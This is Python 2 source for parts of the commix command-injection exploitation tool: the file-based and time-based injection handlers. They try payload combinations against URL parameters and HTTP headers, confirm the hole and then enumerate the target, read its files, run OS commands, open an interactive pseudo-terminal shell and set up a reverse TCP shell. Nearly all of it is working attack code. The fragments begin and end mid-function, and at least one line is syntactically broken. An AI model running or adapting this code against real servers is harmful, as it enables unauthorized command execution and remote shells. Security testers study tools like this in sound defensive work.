session_handler.export_stored_cmd(url, cmd, vuln_parameter) if shell: if shell != "": print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" if not shell or shell == "": if settings.VERBOSITY_LEVEL >= 1: print "" err_msg = "The '" + cmd + "' command, does not return any output." print settings.print_critical_msg(err_msg) + "\n" elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if gotshell == "": gotshell = "enter" err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) pass except KeyboardInterrupt: if settings.VERBOSITY_LEVEL >= 1: print "" # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise
def fb_injection_handler(url, timesec, filename, http_request_method, url_time_response): shell = False counter = 1 vp_flag = True exit_loops = False no_result = True is_encoded = False stop_injection = False call_tmp_based = False next_attack_vector = False export_injection_info = False injection_type = "semi-blind command injection" technique = "file-based command injection technique" tmp_path = check_tmp_path(url, timesec, filename, http_request_method, url_time_response) if not settings.LOAD_SESSION or settings.RETEST == True: TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) info_msg = "Trying to create a file in '" + settings.WEB_ROOT info_msg += "' for command execution results... " print settings.print_info_msg(info_msg) i = 0 # Calculate all possible combinations total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) # Check if defined alter shell alter_shell = menu.options.alter_shell for whitespace in settings.WHITESPACE: for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False # If a previous session is available. if settings.LOAD_SESSION: try: settings.FILE_BASED_STATE = True url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method) checks.check_for_stored_tamper(payload) OUTPUT_TEXTFILE = TAG + ".txt" session_handler.notification(url, technique, injection_type) if technique == "tempfile-based injection technique": #settings.LOAD_SESSION = True tfb_handler.exploitation(url, timesec, filename, tmp_path, http_request_method, url_time_response) except TypeError: err_msg = "An error occurred while accessing session file ('" err_msg += settings.SESSION_FILE + "'). " err_msg += "Use the '--flush-session' option." print settings.print_critical_msg(err_msg) raise SystemExit() if settings.RETEST == True: settings.RETEST = False from src.core.injections.results_based.techniques.classic import cb_handler cb_handler.exploitation(url, timesec, filename, http_request_method) if not settings.LOAD_SESSION: i = i + 1 # The output file for file-based injection technique. OUTPUT_TEXTFILE = TAG + ".txt" # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" try: # File-based decision payload (check if host is vulnerable). if alter_shell : payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE) else: payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE) # Check if defined "--prefix" option. # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace(" ", whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: payload_msg = payload.replace("\n", "\\n") print settings.print_payload(payload_msg) # Check if defined "--verbose" option. elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for injection..." print settings.print_info_msg(info_msg) print settings.print_payload(payload) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie header injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) response = fb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent HTTP Header Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent HTTP header injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) response = fb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer HTTP Header Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to Referer HTTP header injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) response = fb_injector.referer_injection_test(url, vuln_parameter, payload) # Host HTTP Header Injection elif settings.HOST_INJECTION == True: # Check if target host is vulnerable to Host HTTP header injection. vuln_parameter = parameters.specify_host_parameter( response = fb_injector.host_injection_test(url, vuln_parameter, payload) # Custom HTTP header Injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom HTTP header injection. vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG) response = fb_injector.custom_header_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. response, vuln_parameter = fb_injector.injection_test(payload, http_request_method, url) # Find the directory. output = fb_injector.injection_output(url, OUTPUT_TEXTFILE, timesec) time.sleep(timesec) try: # Check if defined extra headers. request = urllib2.Request(output) headers.do_check(request) # Evaluate test results. output = urllib2.urlopen(request) html_data = shell = re.findall(r"" + TAG + "", html_data) if len(shell) != 0 and shell[0] == TAG and not settings.VERBOSITY_LEVEL >= 1: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... [ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if len(shell) == 0 : raise urllib2.HTTPError(url, 404, 'Error', {}, None) except urllib2.HTTPError, e: if str(e.getcode()) == settings.NOT_FOUND_ERROR: percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if call_tmp_based == True: exit_loops = True tmp_path = os.path.split(menu.options.file_dest)[0] + "/" tfb_controller(no_result, url, timesec, filename, tmp_path, http_request_method, url_time_response) raise # Show an error message, after N failed tries. # Use the "/tmp/" directory for tempfile-based technique. elif i == int(menu.options.failed_tries) and no_result == True : tmp_path = check_tmp_path(url, timesec, filename, http_request_method, url_time_response) warn_msg = "It seems that you don't have permissions to " warn_msg += "read and/or write files in '" + settings.WEB_ROOT + "'." sys.stdout.write("\r" + settings.print_warning_msg(warn_msg)) print "" while True: if not menu.options.batch: question_msg = "Do you want to try the temporary directory (" + tmp_path + ") [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) tmp_upload = sys.stdin.readline().replace("\n","").lower() else: tmp_upload = "" if len(tmp_upload) == 0: tmp_upload = "y" if tmp_upload in settings.CHOICE_YES: exit_loops = True settings.TEMPFILE_BASED_STATE = True call_tfb = tfb_controller(no_result, url, timesec, filename, tmp_path, http_request_method, url_time_response) if call_tfb != False: return True else: if no_result == True: return False else: return True elif tmp_upload in settings.CHOICE_NO: break elif tmp_upload in settings.CHOICE_QUIT: print "" raise else: err_msg = "'" + tmp_upload + "' is not a valid answer." print settings.print_error_msg(err_msg) pass continue else: if exit_loops == False: if not settings.VERBOSITY_LEVEL >= 1: if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(float_percent)+ "%" else: percent = str(float_percent)+ "%" info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... [ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() continue else: continue else: raise elif str(e.getcode()) == settings.UNAUTHORIZED_ERROR: err_msg = "Authorization required!" print settings.print_critical_msg(err_msg) + "\n" raise SystemExit() elif str(e.getcode()) == settings.FORBIDDEN_ERROR: err_msg = "You don't have permission to access this page." print settings.print_critical_msg(err_msg) + "\n" raise SystemExit() except KeyboardInterrupt: # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: if 'vuln_parameter' in locals(): # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except urllib2.URLError, e: warn_msg = "It seems that you don't have permissions to " warn_msg += "read and/or write files in '" + settings.WEB_ROOT + "'." sys.stdout.write("\r" + settings.print_warning_msg(warn_msg)) err_msg = str(e).replace(": "," (") + ")." if menu.options.verbose > 1: print "" print settings.print_critical_msg(err_msg) # Provide custom server's root directory. custom_web_root(url, timesec, filename, http_request_method, url_time_response) continue except: raise # Yaw, got shellz! # Do some magic tricks! if shell: settings.FILE_BASED_STATE = True found = True no_result = False # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True if not settings.VERBOSITY_LEVEL >= 1 and \ not menu.options.alter_shell and \ not next_attack_vector: next_attack_vector = True if settings.COOKIE_INJECTION == True: header_name = " cookie" found_vuln_parameter = vuln_parameter the_type = " parameter" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.HOST_INJECTION == True: header_name = "Host" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.LOAD_SESSION: if not settings.VERBOSITY_LEVEL >= 1: print "" else: checks.total_of_requests() # Print the findings to terminal. success_msg = "The" if len(found_vuln_parameter) > 0 and not "cookie" in header_name : success_msg += " " + http_request_method success_msg += ('', ' (JSON)')[settings.IS_JSON] + ('', ' (SOAP/XML)')[settings.IS_XML] + the_type + header_name success_msg += found_vuln_parameter + " seems injectable via " success_msg += "(" + injection_type.split(" ")[0] + ") " + technique + "." print settings.print_success_msg(success_msg) print settings.SUB_CONTENT_SIGN + "Payload: " + str(checks.url_decode(payload)) + Style.RESET_ALL # Export session if not settings.LOAD_SESSION: session_handler.injection_point_importation(url, technique, injection_type, separator, shell[0], vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response=0, timesec=0, how_long=0, output_length=0, is_vulnerable=menu.options.level) else: whitespace = settings.WHITESPACE[0] settings.LOAD_SESSION = False # Check for any enumeration options. new_line = True if settings.ENUMERATION_DONE == True : while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " enumerate_again = raw_input("\n" + settings.print_question_msg(question_msg)).lower() else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "y" if enumerate_again in settings.CHOICE_YES: fb_enumeration.do_check(separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) # print "" break elif enumerate_again in settings.CHOICE_NO: new_line = False break elif file_access_again in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise SystemExit() else: err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: if menu.enumeration_options(): fb_enumeration.do_check(separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if not menu.file_access_options() and not menu.options.os_cmd: if not settings.VERBOSITY_LEVEL >= 1 and new_line: print "" # Check for any system file access options. if settings.FILE_ACCESS_DONE == True : if settings.ENUMERATION_DONE != True: print "" while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) file_access_again = sys.stdin.readline().replace("\n","").lower() else: file_access_again = "" if len(file_access_again) == 0: file_access_again= "y" if file_access_again in settings.CHOICE_YES: fb_file_access.do_check(separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) print "" break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise SystemExit() else: err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: if menu.file_access_options(): # if not menu.enumeration_options(): # print "" fb_file_access.do_check(separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) print "" # Check if defined single cmd. if menu.options.os_cmd: # if not menu.file_access_options(): # print "" fb_enumeration.single_os_cmd_exec(separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise SystemExit() try: # Pseudo-Terminal shell go_back = False go_back_again = False while True: # Delete previous shell (text) files (output) # if settings.VERBOSITY_LEVEL >= 1: # print "" delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if settings.VERBOSITY_LEVEL >= 1: print "" if go_back == True: break if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) gotshell = sys.stdin.readline().replace("\n","").lower() else: gotshell = "" if len(gotshell) == 0: gotshell = "y" if gotshell in settings.CHOICE_YES: if not menu.options.batch: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) # if settings.VERBOSITY_LEVEL >= 1: # print "" if cmd.lower() in settings.SHELL_OPTIONS: go_back, go_back_again = shell_options.check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again, payload, OUTPUT_TEXTFILE) if go_back and go_back_again == False: break if go_back and go_back_again: return True else: time.sleep(timesec) response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if menu.options.ignore_session or \ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # Command execution results. shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, timesec) shell = "".join(str(p) for p in shell) if not menu.options.ignore_session : session_handler.store_cmd(url, cmd, shell, vuln_parameter) else: shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter) if shell: if shell != "": # Update logs with executed cmds and execution results. logs.executed_command(filename, cmd, shell) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" if not shell or shell == "": if settings.VERBOSITY_LEVEL >= 1: print "" err_msg = "The '" + cmd + "' command, does not return any output." print settings.print_critical_msg(err_msg) + "\n" elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise SystemExit() else: err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) pass except KeyboardInterrupt: # if settings.VERBOSITY_LEVEL >= 1: print "" # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise
def tb_injection_handler(url, delay, filename, http_request_method, url_time_response): counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False is_vulnerable = False again_warning = True false_positive_warning = False export_injection_info = False how_long = 0 how_long_statistic = 0 injection_type = "Blind Command Injection" technique = "time-based injection technique" if menu.options.verbose: print settings.INFO_SIGN + "Testing the " + technique + "... " # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = settings.MAXLEN # Check if defined "--url-reload" option. if menu.options.url_reload == True: print Fore.YELLOW + settings.WARNING_SIGN + "The '--url-reload' option is not available in " + technique + "." + Style.RESET_ALL # Calculate all possible combinations total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION)) for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: # If a previous session is available. if settings.LOAD_SESSION and session_handler.notification(url, technique): cmd = shell = "" url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method) settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - delay if settings.RETEST == True: settings.RETEST = False from src.core.injections.results_based.techniques.classic import cb_handler cb_handler.exploitation(url, delay, filename, http_request_method) if not settings.LOAD_SESSION: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Define alter shell alter_shell = menu.options.alter_shell # Change TAG on every request to prevent false-positive results. TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6)) tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: if alter_shell: # Time-based decision payload (check if host is vulnerable). payload = tb_payloads.decision_alter_shell(separator, TAG, output_length, delay, http_request_method) else: # Time-based decision payload (check if host is vulnerable). payload = tb_payloads.decision(separator, TAG, output_length, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: print Fore.GREY + settings.PAYLOAD_SIGN + payload.replace("\n", "\\n") + Style.RESET_ALL # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) how_long = tb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) how_long = tb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) how_long = tb_injector.referer_injection_test(url, vuln_parameter, payload) # Custom HTTP header Injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom http header injection. vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG) how_long = tb_injector.custom_header_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tb_injector.injection_test(payload, http_request_method, url) # Statistical analysis in time responses. how_long_statistic = how_long_statistic + how_long # Reset the how_long_statistic counter if output_length == tag_length - 1: how_long_statistic = 0 # Injection percentage calculation percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total * 1.0)),2)) if percent == 100 and no_result == True: if not menu.options.verbose: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = "" else: if (url_time_response == 0 and (how_long - delay) >= 0) or \ (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \ (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) : # Time relative false positive fixation. false_positive_fixation = False if len(TAG) == output_length: # Windows targets. if settings.TARGET_OS == "win": if how_long > (how_long_statistic / output_length): false_positive_fixation = True else: false_positive_warning = True # Unix-like targets. else: if delay == 1 and (how_long_statistic == delay) or \ delay == 1 and (how_long_statistic == how_long) or \ delay > 1 and (how_long_statistic == (output_length + delay)) and \ how_long == delay + 1: false_positive_fixation = True else: false_positive_warning = True # Identified false positive warning message. if false_positive_warning and again_warning: again_warning = False warning_msg = settings.WARNING_SIGN + "Unexpected time delays have been identified due to unstable " warning_msg += "requests. This behavior which may lead to false-positive results." sys.stdout.write("\r" + Fore.YELLOW + warning_msg + Style.RESET_ALL) print "" # Check if false positive fixation is True. if false_positive_fixation: false_positive_fixation = False settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - delay randv1 = random.randrange(0, 1) randv2 = random.randrange(1, 2) randvcalc = randv1 + randv2 if settings.TARGET_OS == "win": if alter_shell: cmd = settings.WIN_PYTHON_DIR + "python.exe -c \"print (" + str(randv1) + " + " + str(randv2) + ")\"" else: cmd = "powershell.exe -InputFormat none write (" + str(randv1) + " + " + str(randv2) + ")" else: cmd = "(" + str(randv1) + " + " + str(randv2) + ")" # Check for false positive resutls how_long, output = tb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long, url_time_response) if (url_time_response == 0 and (how_long - delay) >= 0) or \ (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \ (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) : if str(output) == str(randvcalc) and len(TAG) == output_length: is_vulnerable = True how_long_statistic = 0 if not menu.options.verbose: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = "" else: break # False positive else: if not menu.options.verbose: percent = str(float_percent)+ "%" sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() continue else: if not menu.options.verbose: percent = str(float_percent)+ "%" sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() continue if not menu.options.verbose: sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except SystemExit: raise except: break break # Yaw, got shellz! # Do some magic tricks! if (url_time_response == 0 and (how_long - delay) >= 0) or \ (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \ (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) : if (len(TAG) == output_length) and \ (is_vulnerable == True or settings.LOAD_SESSION and is_vulnerable == "True"): found = True no_result = False if settings.LOAD_SESSION: is_vulnerable = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.LOAD_SESSION: print "" # Print the findings to terminal. print Style.BRIGHT + "(!) The (" + http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to " + injection_type + "." + Style.RESET_ALL print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL if not settings.LOAD_SESSION: shell = "" session_handler.injection_point_importation(url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable) is_vulnerable = False else: settings.LOAD_SESSION = False new_line = False # Check for any enumeration options. if settings.ENUMERATION_DONE == True: while True: enumerate_again = raw_input("\n" + settings.QUESTION_SIGN + "Do you want to enumerate again? [Y/n/q] > ").lower() if enumerate_again in settings.CHOICE_YES: tb_enumeration.do_check(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) print "" break elif enumerate_again in settings.CHOICE_NO: new_line = True break elif enumerate_again in settings.CHOICE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + settings.ERROR_SIGN + "'" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL + "\n" pass else: if menu.enumeration_options(): tb_enumeration.do_check(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) print "" # Check for any system file access options. if settings.FILE_ACCESS_DONE == True: while True: file_access_again = raw_input(settings.QUESTION_SIGN + "Do you want to access files again? [Y/n/q] > ").lower() if file_access_again in settings.CHOICE_YES: tb_file_access.do_check(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) break elif file_access_again in settings.CHOICE_NO: if not new_line: new_line = True break elif file_access_again in settings.CHOICE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + settings.ERROR_SIGN + "'" + file_access_again + "' is not a valid answer." + Style.RESET_ALL + "\n" pass else: # if not menu.enumeration_options() and not menu.options.os_cmd: # print "" tb_file_access.do_check(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) # Check if defined single cmd. if menu.options.os_cmd: cmd = menu.options.os_cmd check_how_long, output = tb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) # Export injection result tb_injector.export_injection_results(cmd, separator, output, check_how_long) sys.exit(0) if not new_line : print "" # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break gotshell = raw_input(settings.QUESTION_SIGN + "Do you want a Pseudo-Terminal? [Y/n/q] > ").lower() if gotshell in settings.CHOICE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) if os_shell_option == False: if no_result == True: return False else: return True elif os_shell_option == "quit": sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": print Fore.YELLOW + settings.WARNING_SIGN + "You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n" elif os_shell_option == "reverse_tcp": settings.REVERSE_TCP = True # Set up LHOST / LPORT for The reverse TCP connection. reverse_tcp.configure_reverse_tcp() if settings.REVERSE_TCP == False: continue while True: if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options(settings.LHOST) else: cmd = reverse_tcp.reverse_tcp_options() result = checks.check_reverse_tcp_options(cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True settings.REVERSE_TCP = False break # Command execution results. from src.core.injections.results_based.techniques.classic import cb_injector separator = checks.time_based_separators(separator, http_request_method) whitespace = settings.WHITESPACES[0] response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Evaluate injection results. shell = cb_injector.injection_results(response, TAG) # Export injection result if menu.options.verbose: print "" print Back.RED + settings.ERROR_SIGN + "The reverse TCP connection has been failed!" + Style.RESET_ALL else: pass else: print "" if menu.options.ignore_session or \ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # The main command injection exploitation. check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) # Export injection result tb_injector.export_injection_results(cmd, separator, output, check_how_long) if not menu.options.ignore_session : session_handler.store_cmd(url, cmd, output, vuln_parameter) else: output 